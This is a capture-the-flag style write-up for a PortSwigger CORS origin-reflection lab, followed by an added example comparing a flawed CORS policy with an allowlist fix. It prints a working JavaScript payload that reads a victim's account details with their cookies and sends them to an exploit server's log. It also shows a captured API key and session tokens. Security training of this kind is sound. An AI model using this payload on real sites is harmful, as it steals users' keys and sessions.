What is Cross-origin resource sharing (CORS)
Cross-Origin Resource Sharing (CORS) is a security mechanism implemented in web browsers. It controls access to web application resources (such as fonts, scripts, images, etc.) that are requested from different origins.
CORS vulnerabilities refer to situations where an attacker can exploit cross-origin resource sharing to compromise security.
By exploiting CORS vulnerabilities, attackers can take advantage of issues such as CORS misconfiguration, cross-origin data leakage, cross-site request forgery (CSRF), etc.
Cross-origin resource sharing (CORS) Practical Labs
CORS vulnerability with basic origin reflection
CORS vulnerability with trusted null origin
CORS vulnerability with trusted insecure protocols
CORS vulnerability with basic origin reflection
Lab Description Of Cross-origin resource sharing (CORS)
This lab contains an insecure CORS configuration that trusts all origins. To solve the lab, you need to write JavaScript that uses CORS to retrieve the administrator’s API key, and upload the code to an exploit server. The lab will be solved when you submit the administrator’s API key.
You can use the username and password “wiener:peter” to log in to the lab.
Lab Solution Of Cross-origin resource sharing (CORS)
First, access the lab. After accessing it, open Burp Suite and enable the proxy in your browser.
Once you’ve done that, click on “my account” and log in using the provided credentials.
After logging in with Wiener’s account, you will see some details displayed.
You will see a GET /accountDetails request whose response is JSON-formatted.
Send this request to the repeater tab for testing purposes.
Add an extra header to the request to see if the server allows it:
Origin: https://example.com
<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
    // include the victim's session cookie in the cross-origin request
    req.withCredentials = true;
    req.send();

    // runs once the response has been read; passes it to the exploit server's log
    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>
Replace “YOUR-LAB-ID” in the script with your lab ID (taken from the lab URL) and store it on the exploit server.
In my case, this is the lab URL: https://0aaa00b204a4d58580de498d00db003d.web-security-academy.net
Updated script version:
<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://0aaa00b204a4d58580de498d00db003d.web-security-academy.net/accountDetails',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='/log?key='+this.responseText;
    };
</script>
Copy this script and store it on the exploit server. Once stored, deliver the exploit to the victim.
After performing the above steps, click on “access log.”
"GET /log?key={%20%20%22username%22:%20%22administrator%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22:%20%22nsLocr7bLZH3jTHwol2DylLNqOgpgQBQ%22,%20%20%22sessions%22:%20[%20%20%20%20%22qo3kg91owDRqGJdpWGtMB3ZIkUzhpLQl%22,%20%20%20%20%22pF6dqwK6kCxLsp2NoRms54HG76NiPHwP%22%20%20]} HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
You can see that a GET request has provided me with the administrator’s API key.
nsLocr7bLZH3jTHwol2DylLNqOgpgQBQ
Now, I will submit this key in the lab.
By submitting the key in PortSwigger Web Security Lab, I have successfully solved the “CORS vulnerability with basic origin reflection” lab.
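The Repeater check and the server-side fix for this misconfiguration, as an added example that is not part of the original write-up or the lab: the first function reproduces the origin-reflection flaw, the second replaces it with an exact-match allowlist, and the audit runs the same kind of probe used in Repeater against both. The function names, the allowlist entry and the probe origins are assumptions made for illustration.

```javascript
// Added example; every origin and name below is constructed for illustration.

// Flawed policy: echoes any Origin back and allows credentials,
// which is the behaviour the lab's /accountDetails endpoint shows.
function reflectingCors(origin) {
  if (!origin) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Hardened policy: exact match against a fixed set of full https origins.
const TRUSTED_ORIGINS = new Set(['https://app.example.com']); // assumed value

function allowlistCors(origin) {
  // "null", http:// variants and look-alike hosts all fail the exact match.
  if (typeof origin !== 'string' || !TRUSTED_ORIGINS.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin', // keeps caches from serving one origin's headers to another
  };
}

// The Repeater check as code: did the response to a probe carrying an
// untrusted Origin grant that origin credentialed read access?
function trustsProbeOrigin(headers, probeOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v).trim();
  return h['access-control-allow-origin'] === probeOrigin &&
         h['access-control-allow-credentials'] === 'true';
}

// Probes: arbitrary site, null origin, insecure-protocol variant, suffix look-alike.
const PROBES = ['https://example.com', 'null', 'http://app.example.com',
                'https://app.example.com.evil.example'];

// Returns the probe origins a policy wrongly trusts (empty array = pass).
function audit(policy) {
  return PROBES.filter((o) => trustsProbeOrigin(policy(o), o));
}
```

An empty result from audit means none of the untrusted probe origins was granted credentialed access; the reflecting policy fails all four probes.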